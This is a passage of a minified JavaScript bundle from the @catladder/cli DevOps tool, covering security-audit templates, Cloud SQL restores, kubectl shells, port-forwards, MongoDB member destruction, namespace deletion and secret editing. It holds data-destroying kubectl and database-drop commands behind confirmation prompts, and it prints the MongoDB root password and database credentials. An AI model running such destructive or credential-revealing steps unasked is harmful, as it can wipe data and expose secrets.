@catladder/cli
Version:
Panter cli tool for cloud CI/CD and DevOps
6 lines (4 loc) ā¢ 5.02 MB
JavaScript
(()=>{var __webpack_modules__={92488:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});t.evaluateDocument=t.makeTemplate=void 0;const a=i(r(21888));const n=a.default;const s="ā
";const o="ā";const l=`${s}/${o}`;const c="@...";const u=[["Responsible",l,"Description","Note","More Information"]].concat(n.map((e=>[Array(e.responsibles).fill(c).join(", "),l,e.description,"",e.more])));function makeTable(e){const t=calculateColumnWidths(e);return`\n${makeRow(e[0],t," ")}\n${makeRow(e[0].map((()=>"")),t,"-")}\n${e.slice(1).map((e=>makeRow(e,t," "))).join("\n")}\n`}function calculateColumnWidths(e){const t=e[0].length;return Array.from({length:t},((e,t)=>t)).map((t=>Math.max(...e.map((e=>e[t].length)))))}function makeRow(e,t,r){return`| ${e.map(((e,i)=>e.padEnd(t[i],r))).join(" | ")} |`}function makeTemplate(){return`\n# Security Audit Report\n\nA security audit report document is a comprehensive assessment of an application's security posture, containing security topics that auditors can mark to indicate the state of various security aspects.\n\nIt serves as a structured guide for security team to evaluate different security factors such as authentication, authorization, data encryption, input validation, and more.\n\n## General Information\n\n- Project Owner is @...\n- Dev team:\n - @...\n - @...\n - @...\n\n## Project Security\n\n${makeTable(u)}\n\n`}t.makeTemplate=makeTemplate;function evaluateDocument(e){var t,r;const i=(r=(t=e.match(/^\s*\|.*?\|\s*$/gm))===null||t===void 0?void 0:t.map((e=>e.trim())))!==null&&r!==void 0?r:[];const a=i.map((e=>e.split("|").map((e=>e.trim())))).slice(2);const o=new Set(n.map((e=>e.description)));const u=a.map((e=>{const t=e[1].split(", ");const r=e[2];const i=e[3];const a=e[4];const n=!o.has(i);const u=!n&&!r.includes(l)&&!t.some((e=>e.includes(c)));const p=!n&&u&&r.includes(s);return{responsibles:t,answer:r,description:i,note:a,isUnknown:n,isAnswered:u,isSecured:p}}));const p=n.length;const d=u.filter((e=>e.isAnswered)).length;const h=u.filter((e=>e.isSecured)).length;const m=u.filter((e=>e.isUnknown)).length;const b=Math.round(h/p*100);return{topics:u,score:{rating:b,totalTopics:p,answeredTopics:d,securedTopics:h,unknownTopics:m}}}t.evaluateDocument=evaluateDocument},98933:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});t.createSecurityAuditMergeRequest=t.SECURITY_AUDIT_FILE_NAME=void 0;const i=r(72807);const a=r(92488);function makeDatedBranchName(e){const t=(new Date).toISOString().slice(0,-5).replaceAll(/[:.T]/g,"-");return`${e}-${t}`}const n="Draft: chore(security): add security audit document";t.SECURITY_AUDIT_FILE_NAME="SECURITY.md";async function createSecurityAuditMergeRequest({projectId:e,mainBranch:r,userId:s,api:o}){const l=(await i.Result.wrapAsync((()=>o.MergeRequests.all({state:"opened",wip:"yes",labels:"security-audit"})))).mapErr((()=>`could not search for existing merge requests`));if(l.isErr())return l;const c=l.value[0];if(c)return(0,i.Err)(`open merge request with security audit already exists: ${c.web_url}`);const u=i.Result.wrap((()=>(0,a.makeTemplate)())).mapErr((()=>"could not make security audit template document"));if(u.isErr())return u;const p=(await i.Result.wrapAsync((()=>o.Branches.create(e,makeDatedBranchName("chore/security-audit"),r)))).mapErr((e=>{console.log(e);return"could not create branch"}));if(p.isErr())return p;const d=(await i.Result.wrapAsync((()=>o.Commits.create(e,p.value.name,"chore(security): add empty security audit document template",[{action:"create",filePath:t.SECURITY_AUDIT_FILE_NAME,content:u.value,encoding:"text"}])))).mapErr((()=>"could not create commit"));if(d.isErr())return d;const h=(await i.Result.wrapAsync((()=>o.MergeRequests.create(e,p.value.name,r,n,{description:`Please follow and update security audit document in \`${t.SECURITY_AUDIT_FILE_NAME}\`.`,assigneeId:s,squash:true,labels:"security-audit",removeSourceBranch:true})))).mapErr((()=>"could not create merge request"));return h}t.createSecurityAuditMergeRequest=createSecurityAuditMergeRequest},96725:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});t.makeSecurityAuditOverview=t.evaluateSecurityAudit=void 0;const i=r(72807);const a=r(71017);const n=r(73292);const s=r(98933);const o=r(92488);async function evaluateSecurityAudit({path:e}){return(await i.Result.wrapAsync((async()=>{const t=(0,a.join)(e,s.SECURITY_AUDIT_FILE_NAME);const r=await(0,n.readFile)(t);const i=r.toString("utf-8");return(0,o.evaluateDocument)(i)}))).mapErr((e=>`could not evaluate ${s.SECURITY_AUDIT_FILE_NAME}: ${e}`))}t.evaluateSecurityAudit=evaluateSecurityAudit;function makeSecurityAuditOverview(e){const ratingToEmo=e=>e<33?"š„":e<66?"šØ":"š©";return`Project security posture overview:\n š§ Total topics: ${e.score.totalTopics}\n š Secured topics: ${e.score.securedTopics}\n š¢ Answered topics: ${e.score.answeredTopics}\n ā Unknown topics: ${e.score.unknownTopics}\n š Rating: ${ratingToEmo(e.score.rating)} ${e.score.rating}/100`}t.makeSecurityAuditOverview=makeSecurityAuditOverview},12200:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=i(r(71491));const n=i(r(92260));const s=r(52510);const o=i(r(47350));const l=i(r(25630));const c=i(r(42495));const u=i(r(14263));const p=i(r(27052));const d=r(73557);const h=r(36351);const m=r(67896);t["default"]=async()=>{const e=new a.default;const t=(0,m.boxWithAsci)(`catladder š» v${n.default.version} āØ`);e.delimiter("catladder $").history("catladder").show().log("").log(t).log("");await(0,h.showProjectBanner)(e);(0,d.verify)(e);(0,o.default)(e);(0,u.default)(e);(0,c.default)(e);(0,l.default)(e);(0,p.default)(e);process.on("exit",(()=>{(0,s.stopAllPortForwards)()}))}},70168:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(78651);const a=r(90742);t["default"]=async e=>e.command("cloud-sql-restore-db","restore a db from one source to another target").action((async function restoreDb(){const{sourceInstance:e}=await this.prompt({type:"input",name:"sourceInstance",message:"Source instance (connection string or 'local')? š¤ "});let t;let r;let n;let s;if(e==="local"){const{sourceLocalPort:e}=await this.prompt({type:"number",name:"sourceLocalPort",default:5432,message:"Local Port for source? š¤ "});n=e}else{n=54399;t=await(0,a.startCloudSqlProxyInBackground)({instanceName:e,localPort:n})}const{sourceUsername:o}=await this.prompt({type:"input",name:"sourceUsername",default:"postgres",message:"Source Username? š¤ "});const{sourcePassword:l}=await this.prompt({type:"input",name:"sourcePassword",message:"Source Password? š¤ "});const{sourceDbName:c}=await this.prompt({type:"input",name:"sourceDbName",message:"Source DB name? š¤ "});const{targetInstance:u}=await this.prompt({type:"input",name:"targetInstance",message:"Target INSTANCE (connection string or 'local')? š¤ "});if(u==="local"){const{targetLocalPort:e}=await this.prompt({type:"number",name:"targetLocalPort",default:5432,message:"Local Port for target? š¤ "});s=e}else{s=54499;r=await(0,a.startCloudSqlProxyInBackground)({instanceName:u,localPort:s})}const{targetUsername:p}=await this.prompt({type:"input",name:"targetUsername",default:"postgres",message:"Target Username? š¤ "});const{targetPassword:d}=await this.prompt({type:"input",name:"targetPassword",message:"Target Password? š¤ "});const{targetDbName:h}=await this.prompt({type:"input",name:"targetDbName",message:"Target DB name? š¤ "});const{shouldContinue:m}=await this.prompt({type:"confirm",name:"shouldContinue",message:`This will drop ${u}/${h} and replace it with ${e}/${c}. Continue? š¤ `});if(!m){return}try{await(0,i.spawnCopyDb)({targetPassword:d,targetPort:s,targetUsername:p,sourceUsername:o,sourcePassword:l,sourcePort:n,sourceDbName:c,targetDbName:h})}finally{t===null||t===void 0?void 0:t.stop();r===null||r===void 0?void 0:r.stop()}}))},42495:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=i(r(70168));t["default"]=async e=>{(0,a.default)(e)}},47350:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});t.getAllNamespacesNames=void 0;const a=i(r(85839));const n=r(79672);const s=r(62774);const o=r(66921);const l=r(52510);const c=r(24398);const u=r(58645);const p=i(r(84057));const d=(0,a.default)((async()=>{const e=(0,n.getk8sApi)();const t=await e.listNamespace();return t.body.items}),{maxAge:3e4,promise:true});const getAllNamespacesNames=async()=>{const e=await d();return e.map((e=>e.metadata.name))};t.getAllNamespacesNames=getAllNamespacesNames;t["default"]=async e=>{e.command("kube-current-context").action((async function(){this.log(await(0,s.getCurrentContext)())}));e.command("kube-list-namespaces","list all namespaces").action((async function(){const e=await(0,t.getAllNamespacesNames)();this.log(e.join("\n"))}));e.command("kube-list-secrets <namespace>","show secrets").autocomplete(u.namespaceAutoCompletion).action((async function({namespace:e}){const t=(0,n.getk8sApi)();const r=await t.listNamespacedSecret(e);this.log(r.body.items.map((e=>e.metadata.name)).join("\n"))}));e.command("kube-list-pods <namespace>","list all pods of namespace").autocomplete(u.namespaceAutoCompletion).action((async function({namespace:e}){const t=(0,n.getk8sApi)();const r=await t.listNamespacedPod(e);this.log(r.body.items.map((e=>e.metadata.name)).join("\n"))}));e.command("kube-stop-portforward <name>","stop a running port forward").autocomplete({data:async()=>(0,l.getAllRunningPortForwards)()}).action((async function({name:e}){(0,l.stopPortForward)(e.trim())}));e.command("kube-get-shell <namespace>","get a shell to a pod in the environment").autocomplete(u.namespaceAutoCompletion).action((async function({namespace:e}){const t=(0,n.getk8sApi)();const r=await t.listNamespacedPod(e);if(r.body.items.length===0){(0,o.logError)(this,"sorry, no pods found");return}const i=r.body.items.map((e=>e.metadata.name));const{podName:a}=await this.prompt({type:"list",name:"podName",choices:i,message:"Which pod? š¤"});await(0,c.getShell)(e,a)}));(0,p.default)(e)}},58645:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});t.namespaceAutoCompletion=void 0;const i=r(47350);t.namespaceAutoCompletion={async data(){const e=await(0,i.getAllNamespacesNames)();return e}}},84057:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(66921);const a=r(91597);const n=r(79672);const s=r(58645);t["default"]=async e=>e.command("kube-port-forward <namespace>","start port-forwarding").autocomplete(s.namespaceAutoCompletion).action((async function({namespace:e}){const t=(0,n.getk8sApi)();const r=await t.listNamespacedPod(e);if(r.body.items.length===0){(0,i.logError)(this,"sorry, no pods found");return}const s=r.body.items.map((e=>e.metadata.name));if(s.length===0){(0,i.logError)(this,"sorry, no pods found");return}const{podName:o}=await this.prompt({type:"list",name:"podName",choices:s,message:"Which pod? š¤"});const{localPort:l}=await this.prompt({type:"number",name:"localPort",message:"Local port: "});const{remotePort:c}=await this.prompt({type:"number",name:"remotePort",message:"Remote port: "});return(0,a.startKubePortForward)(o,l,c,e)}))},25630:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=i(r(64096));const n=i(r(10312));const s=i(r(69055));t["default"]=async e=>{(0,n.default)(e);(0,s.default)(e);(0,a.default)(e)}},64096:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=r(75763);const n=r(50481);const s=r(66921);const o=r(79011);const l=r(39855);const c=i(r(34590));const u=r(33986);const removeFinalizer=async(e,t,r)=>(0,a.exec)(`kubectl patch --namespace ${e} ${t} ${r} -p '{"metadata":{"finalizers":null}}'`);const deleteResource=async(e,t,r)=>(0,a.exec)(`kubectl delete --namespace ${e} ${t} ${r}`);const removeFinalizerAndDelete=async(e,t,r)=>Promise.all([removeFinalizer(e,t,r),await deleteResource(e,t,r)]);t["default"]=async e=>e.command("project-mongo-destroy-member <envComponent>","DESTROY a member of a replicaset in order to reinitialize it").autocomplete(await(0,l.envAndComponents)()).action((async function({envComponent:e}){await c.default.call(this,e);this.log("this command tries to delete a (secondary) member of the replicaset, it's persistent volume claim (pvc) and the volume");this.log("");this.log("this is useful, if you update the stateful set with new volume configuration (different size or storage class)");this.log("");this.log("Kubernetes will usually recreate the missing member with the updated config and mongodb will start synchronizing the new member.");this.log("");this.log("This works without downtime, but should be done when load on the db is low. Also it has not been tested with large dbs (> 10gi)");this.log("");this.log("Deleting the volume and claim often stuck, just wait or cancel and restart.");this.log("");const{understood:t}=await this.prompt({default:true,message:"DO YOU UNDERSTAND?",name:"understood",type:"confirm"});if(!t){throw new Error("abort")}const r=await(0,o.getProjectNamespace)(e);const i=await(0,u.getMongoDbPodsWithReplInfo)(e);const a=await(0,n.getProjectPvcs)(e);const l=i.filter((e=>!e.isMaster));if(l.length===0){(0,s.logError)(this,"sorry, no pods found");return}const p=(await this.prompt({type:"list",name:"podName",choices:l.map((e=>({name:`[ secondary ] ${e.podName}`,value:e.podName}))),message:"Which pod? š¤"})).podName;const d=a.find((e=>e.metadata.name===`datadir-${p}`));if(!d){(0,s.logError)(this,`sorry, no pvc found for ${p}`);return}const{shouldContinue:h}=await this.prompt({default:true,message:"THIS WILL DESTROY THE POD, ITS VOLUME AND ALL ITS DATA ššš!!! continue? š¤",name:"shouldContinue",type:"confirm"});if(!h){throw new Error("abort")}this.log("destroying volume...");try{await removeFinalizerAndDelete(r,"pv",d.spec.volumeName)}catch(e){this.log(e.message)}this.log("destroying volume claim...");try{await removeFinalizerAndDelete(r,"pvc",d.metadata.name)}catch(e){this.log(e.message)}this.log("destroying pod...");await removeFinalizerAndDelete(r,"pod",p)}))},10312:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=r(66921);const n=r(79011);const s=r(39855);const o=i(r(34590));const l=r(33986);t["default"]=async e=>e.command("project-mongo-get-shell <envComponent>","get a shell to a mongodb in the environment").autocomplete(await(0,s.envAndComponents)()).action((async function({envComponent:e}){await o.default.call(this,e);const t=await(0,n.getProjectNamespace)(e);const r=await(0,l.getProjectMongodbAllPodsSortedWithLabel)(e);if(r.length===0){(0,a.logError)(this,"sorry, no pods found");return}let i;if(r.length===1){i=r[0]}else{i=(await this.prompt({type:"list",name:"podName",choices:r,message:"Which pod? š¤"})).podName}return(0,l.getMongodbShell)(t,i)}))},69055:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=r(12145);const n=r(66921);const s=r(91597);const o=r(79011);const l=r(39855);const c=i(r(34590));const u=r(33986);const p=i(r(89881));t["default"]=async e=>e.command("project-mongo-port-forward <envComponent>","port foward to a mongodb").autocomplete(await(0,l.envAndComponents)()).action((async function({envComponent:e}){await c.default.call(this,e);const t=await(0,o.getProjectNamespace)(e);const r=await(0,u.getProjectMongodbAllPodsSortedWithLabel)(e);if(r.length===0){(0,n.logError)(this,"sorry, no pods found");return}let i;if(r.length===1){i=r[0].value}else{i=(await this.prompt({type:"list",name:"podName",choices:r,message:"Which pod? š¤"})).podName}const{localPort:l}=await this.prompt({type:"number",name:"localPort",default:"30000",message:"Local port: "});const{env:d,componentName:h}=(0,a.parseChoice)(e);const m=await(0,a.getEnvVarsResolved)(this,d,h);const b=m===null||m===void 0?void 0:m.MONGODB_ROOT_PASSWORD;const y=`mongodb://root:${b}@localhost:${l}`;p.default.writeSync(y);this.log("");this.log("username: root");this.log(`password: ${b}`);this.log(`connection string: ${y}`);this.log("");this.log("š connection string has been copied to your clipboard!");this.log("");return(0,s.startKubePortForward)(i,l,27017,t)}))},33986:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});t.getProjectMongodbAllPodsSortedWithLabel=t.getMongoDbPodsWithReplInfo=t.podIsMaster=t.executeMongodbCommand=t.getMongodbShell=t.getProjectMongodbAllPods=void 0;const i=r(75763);const a=r(50481);const n=r(79011);const filterMongoDbs=e=>e.filter((e=>e.includes("mongodb")&&!e.includes("mongodb-backup")&&!e.includes("arbiter")));const getProjectMongodbAllPods=async e=>filterMongoDbs(await(0,a.getProjectPodNames)(e));t.getProjectMongodbAllPods=getProjectMongodbAllPods;const getMongodbShell=async(e,t)=>{const r=`kubectl exec -it ${t} --namespace ${e} mongo`;try{await(0,i.spawn)(r,{shell:true,stdio:"inherit",env:{...process.env,DEBUG:""}})}catch(e){}};t.getMongodbShell=getMongodbShell;const executeMongodbCommand=async(e,t,r)=>{const a=`kubectl exec -it ${t} --namespace ${e} -- mongo --quiet --eval "JSON.stringify(${r})"`;const{stdout:n}=await(0,i.exec)(a,{env:{...process.env,DEBUG:""}});return JSON.parse(n)};t.executeMongodbCommand=executeMongodbCommand;const podIsMaster=async(e,r)=>{try{const i=await(0,t.executeMongodbCommand)(e,r,"db.isMaster()");return i.ismaster}catch(e){return null}};t.podIsMaster=podIsMaster;const spaces=e=>" ".repeat(e);const getMongoDbPodsWithReplInfo=async e=>{const r=await(0,n.getProjectNamespace)(e);return(await Promise.all((await(0,t.getProjectMongodbAllPods)(e)).map((async e=>({podName:e,componentName:e.replace(/-mongodb-replicaset-[0-9]+/,""),isMaster:await(0,t.podIsMaster)(r,e)}))))).sort(((e,t)=>e.isMaster?t.isMaster?0:-1:1))};t.getMongoDbPodsWithReplInfo=getMongoDbPodsWithReplInfo;const getProjectMongodbAllPodsSortedWithLabel=async e=>{const r=await(0,t.getMongoDbPodsWithReplInfo)(e);const i=Math.max(...r.map((e=>e.componentName.length)));return r.map((({podName:e,isMaster:t,componentName:r})=>({value:e,name:`[ ${r}${spaces(i-r.length)} ${t?" PRIMARY ":" secondary "}] ${e}`})))};t.getProjectMongodbAllPodsSortedWithLabel=getProjectMongodbAllPodsSortedWithLabel},24103:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(12145);const a=r(90742);const n=r(39855);const s=r(71004);const o=r(78651);t["default"]=async e=>e.command("project-cloud-sql-restore-db","restores a project db from one source to another target").action((async function restoreDb(){var e,t,r,l,c;const u=await(0,n.envAndComponents)();const{sourceEnvAndComponent:p}=await this.prompt({type:"list",name:"sourceEnvAndComponent",choices:u,message:"Source instance (connection string or 'local')? š¤ "});const[d,h]=p.split(":");const m=await(0,i.getPipelineContextByChoice)(d,h);const b=await(0,i.getEnvVarsResolved)(this,m.env,m.name);let y;let g;let v;let w;let j;let O;let _;let k;let C;let P;const closeAll=()=>{y===null||y===void 0?void 0:y.stop();_===null||_===void 0?void 0:_.stop()};if(d==="local"){const r=new s.ConnectionStringParser({scheme:"postgres",hosts:[]});const i=r.parse(b.DATABASE_URL.toString());k=(t=(e=i.hosts)===null||e===void 0?void 0:e[0])===null||t===void 0?void 0:t.port;v=i.username;w=i.password;g=i.endpoint}else{k=54399;y=await(0,a.startCloudSqlProxyInBackground)({instanceName:b.CLOUD_SQL_INSTANCE_CONNECTION_NAME.toString(),localPort:k});v=b.DB_USER.toString();w=b.DB_PASSWORD.toString();g=(r=b.DB_NAME)===null||r===void 0?void 0:r.toString()}const{targetEnvAndComponent:z}=await this.prompt({type:"list",name:"targetEnvAndComponent",choices:u,message:"target env? š¤ "});const[R,x]=z.split(":");const V=await(0,i.getPipelineContextByChoice)(R,x);const N=await(0,i.getEnvVarsResolved)(this,V.env,V.name);if(R==="local"){const e=new s.ConnectionStringParser({scheme:"postgres",hosts:[]});const t=e.parse(N.DATABASE_URL.toString());C=(c=(l=t.hosts)===null||l===void 0?void 0:l[0])===null||c===void 0?void 0:c.port;j=t.username;O=t.password;P=t.endpoint}else{C=54499;_=await(0,a.startCloudSqlProxyInBackground)({instanceName:N.CLOUD_SQL_INSTANCE_CONNECTION_NAME.toString(),localPort:C});j=N.DB_USER.toString();O=N.DB_PASSWORD.toString();P=N.DB_NAME.toString()}const{shouldContinue:D}=await this.prompt({type:"confirm",name:"shouldContinue",message:`This will drop ${R}/${P} and replace it with ${d}/${g}. Continue? š¤ `});if(!D){this.log("abort");closeAll();return}if(V.environment.envType==="prod"){this.log(`\nšØ You are overriding a production environment. Please type in ${N.CLOUD_SQL_INSTANCE_CONNECTION_NAME} to continue\n\n`);const{confirmInstance:e}=await this.prompt({type:"input",name:"confirmInstance",message:"confirm: "});if(e!==N.CLOUD_SQL_INSTANCE_CONNECTION_NAME){this.log("abort");closeAll();return}}try{await(0,o.spawnCopyDb)({targetPassword:O,targetPort:C,targetUsername:j,sourceUsername:v,sourcePassword:w,sourcePort:k,sourceDbName:g,targetDbName:P})}finally{closeAll()}}))},102:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=r(10603);const n=i(r(89881));const s=r(12145);const o=r(39855);const l=r(90742);const c=r(66921);const getProxyInfo=e=>{var t,r,i,n;if((0,a.isOfDeployType)((t=e.deploy)===null||t===void 0?void 0:t.config,"kubernetes")){return getProxyInfoForKubernetes(this,e)}else if((0,a.isOfDeployType)((r=e.deploy)===null||r===void 0?void 0:r.config,"google-cloudrun")){return getProxyInfoForCloudRun(this,e)}throw new Error(`unsupported environment: ${(n=(i=e.deploy)===null||i===void 0?void 0:i.config)===null||n===void 0?void 0:n.type}`)};const getProxyInfoForKubernetes=async(e,t)=>{var r,i;if(!(0,a.isOfDeployType)((r=t.deploy)===null||r===void 0?void 0:r.config,"kubernetes")){throw new Error("unsupported")}const n=await(0,s.getEnvVarsResolved)(e,t.env,t.name);const o=(0,a.createKubernetesCloudsqlBaseValues)(t);const l=(i=(n===null||n===void 0?void 0:n.DB_PASSWORD)||(n===null||n===void 0?void 0:n.POSTGRESQL_PASSWORD))===null||i===void 0?void 0:i.toString();const c=o.cloudsql.fullDbName.toString();const u=o.cloudsql.instanceConnectionName;return{instanceName:u,DB_PASSWORD:l,DB_NAME:c,DB_USER:"postgres"}};const getProxyInfoForCloudRun=async(e,t)=>{var r,i,n,o,l,u;if(!(0,a.isOfDeployType)((r=t.deploy)===null||r===void 0?void 0:r.config,"google-cloudrun")||!((i=t.deploy)===null||i===void 0?void 0:i.config.cloudSql)){const r=(0,a.getDeployConfigType)((n=t.deploy)===null||n===void 0?void 0:n.config);const i=r==="google-cloudrun"?`DeployConfig is missing the cloudSql property`:`Unsupported DeployConfig type: ${r}`;(0,c.logError)(e,i);throw new Error(i)}const p=await(0,s.getEnvVarsResolved)(e,t.env,t.name);return{instanceName:(o=t.deploy)===null||o===void 0?void 0:o.config.cloudSql.instanceConnectionName,DB_PASSWORD:(l=p===null||p===void 0?void 0:p.DB_PASSWORD)===null||l===void 0?void 0:l.toString(),DB_NAME:t.environment.envVars.DB_NAME.toString(),DB_USER:(u=p===null||p===void 0?void 0:p.DB_USER)===null||u===void 0?void 0:u.toString()}};const getDbUrl=({DB_PASSWORD:e,DB_NAME:t,DB_USER:r},i,a="")=>`DATABASE_URL="postgresql://${r}:${e}@localhost:${i}/${t}${a}"`;const getJdbcUrl=({DB_PASSWORD:e,DB_NAME:t,DB_USER:r},i)=>`DATABASE_JDBC_URL="jdbc:postgresql://localhost:${i}/${t}?schema=public&user=${r}&password=${e}"`;t["default"]=async e=>e.command("project-cloud-sql-proxy <envComponent>","proxy to cloud sql db").autocomplete(await(0,o.envAndComponents)()).action((async function({envComponent:e}){const{env:t,componentName:r}=(0,s.parseChoice)(e);if(!r){(0,c.logWarning)(this,"need componentName");return}const i=await(0,s.getPipelineContextByChoice)(t,r);if(t==="review"){(0,c.logWarning)(this,"connection string does not include mr information on review environments")}const{localPort:a}=await this.prompt({type:"number",name:"localPort",default:"54320",message:"Local port: "});const o=await getProxyInfo(i);const u={PGPASSWORD:o.DB_PASSWORD,PGUSER:o.DB_USER,PGDATABASE:o.DB_NAME,PGHOST:"localhost",PGPORT:a};const p=Object.entries(u).map((([e,t])=>`${e}="${t}"`));const d=getDbUrl(o,a);const h=getJdbcUrl(o,a);n.default.writeSync(["","## CloudSQL proxy connection .env variables",d,h,"## DATABASE_URL with schema=public parameter (e. g. Prisma requires this):",`# ${getDbUrl(o,a,`?schema=public`)}`,"## Env variables for libpq (e.g. psql client https://www.postgresql.org/docs/current/libpq-envars.html#LIBPQ-ENVARS)",...p,""].join("\n"));(0,c.logLines)(this,null,"Connection strings env variables DATABASE_URL and those for the 'psql' client (copied to your clipboard for .env file):",d,h,...p,null,"DATABASE_URL with schema=public parameter (e. g. Prisma requires this):",getDbUrl(o,a,`?schema=public`),null);try{await(0,l.startCloudSqlProxyInCurrentShell)({instanceName:o.instanceName,localPort:a})}catch(e){if(!(e instanceof Error))throw e;if(e.message!==l.ERROR_NOT_INSTALLED)throw e;(0,c.logError)(this,e.message,null,"Please install the Cloud SQL Auth Proxy from:",`https://cloud.google.com/sql/docs/postgres/connect-auth-proxy#install`,null)}}))},23410:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});t.projectConfigSecrets=void 0;const i=r(10603);const a=r(10969);const n=r(23255);const s=r(12145);const o=r(47925);const l=r(12927);const c=r(31421);const u=r(39855);const resolveJson=e=>Object.fromEntries(Object.entries(e).map((([e,t])=>[e,Object.fromEntries(Object.entries(t).map((([e,t])=>[e,Object.fromEntries(Object.entries(t).map((([e,t])=>{try{return[e,JSON.parse(t)]}catch(r){return[e,t]}})))])))])));const getSecretEnvVarKeysToConfigure=async(e,t)=>{const{secretEnvVarKeys:r,jobOnlyVars:i}=await(0,s.getEnvironment)(e,t);return[...i.build.secretEnvVarKeys,...i.deploy.secretEnvVarKeys,...r].filter((e=>!e.hidden)).map((e=>e.key))};const getEnvVarsToEdit=async(e,t,r)=>{const a=await getSecretEnvVarKeysToConfigure(t,r);const n=await(0,s.getEnvVarsResolved)(e,t,r);const o=await(0,s.getJobOnlyEnvVarsResolved)(e,t,r);const l={...n,...o};return Object.fromEntries(a.map((e=>{const a=l[e];const n=a==="$"+(0,i.getSecretVarName)(t,r,e);return[e,n?"šØ FILL ME":a]})))};const doItFor=async(e,t)=>{let r=Object.fromEntries(await Promise.all(Object.entries(t).map((async([t,r])=>[t,Object.fromEntries(await Promise.all(r.map((async r=>[r,await getEnvVarsToEdit(e,r,t)]))))]))));let i=true;while(i){r=await(0,o.editAsFile)(resolveJson(r),(0,a.stripIndents)`
Please fill in all secrets for:
${Object.entries(t).map((([e,t])=>`- ${e}: ${t.join(", ")}`)).join("\n")}
`);i=false;for(const[a,s]of Object.entries(t)){for(const t of s){const s=r[a][t]?Object.keys(r[a][t]):[];const o=await getSecretEnvVarKeysToConfigure(t,a);const l=(0,n.difference)(s,o);const u=(0,n.difference)(o,s);if(l.length>0||u.length>0){e.log("");e.log(`šæ Oh no! There is something wrong with "${a}"`);e.log("");if(l.length>0){e.log("these secrets are not declared in the config");l.forEach((t=>e.log(t)));e.log("")}if(u.length>0){e.log("these secrets have not been provided:");u.forEach((t=>e.log(t)));e.log("")}await(0,c.delay)(1e3);const{shouldContinue:t}=await e.prompt({default:true,message:"Try again? š¤",name:"shouldContinue",type:"confirm"});if(!t){throw new Error("abort")}i=true}}}}e.log("");e.log("upserting all variables, please wait...");e.log("");for(const[i,a]of Object.entries(t)){for(const t of a){e.log("upserting "+t+":"+i+"...\n");await(0,l.upsertAllVariables)(e,r[i][t],t,i);e.log("");e.log("ā
"+t+":"+i);e.log("--------------------------------\n")}}e.log("done! š»");e.log("")};const projectConfigSecrets=async(e,t)=>{if(!t){const t=await(0,s.getAllComponentsWithAllEnvsHierarchical)();await doItFor(e,t)}else{const{env:r,componentName:i}=(0,s.parseChoice)(t);if(!i){const t=await(0,s.getProjectComponents)();await doItFor(e,Object.fromEntries(t.map((e=>[e,[r]]))))}if(i){await doItFor(e,{[i]:[r]})}}};t.projectConfigSecrets=projectConfigSecrets;t["default"]=async e=>{e.command("project-config-secrets [envComponent]","setup/update secrets stored in pass").autocomplete(await(0,u.allEnvsAndAllComponents)()).action((async function({envComponent:e}){return await(0,t.projectConfigSecrets)(this,e)}))}},50626:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=r(79672);const n=r(50481);const s=r(66921);const o=r(79011);const l=r(39855);const c=i(r(34590));t["default"]=async e=>e.command("project-delete-pods <envComponent>","delete / restart pods").autocomplete(await(0,l.envAndComponents)()).action((async function({envComponent:e}){await c.default.call(this,e);const t=await(0,o.getProjectNamespace)(e);const r=await(0,n.getProjectPodNames)(e);if(r.length===0){(0,s.logError)(this,"sorry, no pods found");return}const{selectedPodNames:i}=await this.prompt({type:"checkbox",name:"selectedPodNames",choices:r,message:"Which pods to delete / restart ? š¤ "});this.log("the following pods will be DELETED š (and therefore restarted šø)");this.log("");i.forEach((e=>this.log(e)));this.log("");const{shouldContinue:l}=await this.prompt({type:"confirm",name:"shouldContinue",message:"Continue ? š¤ "});this.log("");const u=(0,a.getk8sApi)();if(l){for(const e of i){await u.deleteNamespacedPod(e,t,"true");this.log(`deleted pod '${e}'`)}}}))},30814:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(75763);const a=r(79011);const n=r(39855);t["default"]=async e=>e.command("project-delete <envComponent>","deletes a environment of a project (it deletes the namespace)").autocomplete(await(0,n.envAndComponents)()).action((async function({envComponent:e}){const t=await(0,a.getProjectNamespace)(e);const{shouldContinue:r}=await this.prompt({type:"confirm",name:"shouldContinue",message:`This will delete the ${t}. You have to reinitialize it if you need it in the future. All data will be lost. Continue? š¤ `});if(!r){return}const n=`kubectl delete namespace ${t}`;const{stdout:s}=await(0,i.exec)(n,{env:{...process.env,DEBUG:""}});this.log(s)}))},946:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(12145);const a=r(39855);t["default"]=async e=>e.command("project-env-vars 